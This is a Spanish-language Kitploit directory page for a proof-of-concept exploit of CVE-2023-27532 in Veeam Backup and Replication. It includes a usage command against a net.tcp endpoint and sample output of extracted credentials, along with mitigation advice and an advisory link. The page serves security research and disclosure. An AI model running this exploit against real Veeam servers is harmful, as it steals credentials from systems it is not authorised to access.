Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-27532 — Exploit de prueba de concepto para CVE-2023-27532 en Veeam Backup and Replication que abusa de un endpoint de API no seguro para extraer credenciales del sistema objetivo. | Kitploit
Herramientas/GitHubGitHub/horizon3ai/cve-2023-27532
Análisis de VulnerabilidadesExplotaciónPruebas de Seguridad de APIsPruebas de PenetraciónRed Teaming
GitHubhorizon3ai/cve-2023-27532

CVE-2023-27532

Exploit de prueba de concepto para CVE-2023-27532 en Veeam Backup and Replication que abusa de un endpoint de API no seguro para extraer credenciales del sistema objetivo.

Ver Repositorio
74112hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-27532

PoC para CVE-2023-27532 que afecta a Veeam Backup and Replication

Análisis técnico

En nuestro blog se puede encontrar un análisis técnico de la causa raíz de la vulnerabilidad: https://www.horizon3.ai/veeam-backup-and-replication-cve-2023-27532-deep-dive

Resumen

Este PoC abusa de un endpoint API no seguro para extraer credenciales.

Uso

root@kitploit:~
/home/dev/RiderProjects/Veeam_CVE-2023-27532/CVE-2023-27532/bin/Debug/net6.0/CVE-2023-27532 net.tcp://192.168.1.139:9401/
UserName = dev Password = Super Secret Password 
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  
UserName = root Password =  

Mitigaciones

Actualice a la última versión o mitigue siguiendo las instrucciones dentro del aviso de Veeam

  • https://www.veeam.com/kb4424

Siga al equipo de ataque de Horizon3.ai en Twitter para conocer las últimas investigaciones de seguridad:

  • Equipo de ataque Horizon3
  • James Horseman
  • Zach Hanley

Aviso legal

Este software ha sido creado únicamente con fines de investigación académica y para el desarrollo de técnicas defensivas efectivas, y no está destinado a ser utilizado para atacar sistemas excepto cuando se haya autorizado explícitamente. Los mantenedores del proyecto no son responsables ni se les puede atribuir el mal uso del software. Úselo de manera responsable.

Descargar herramienta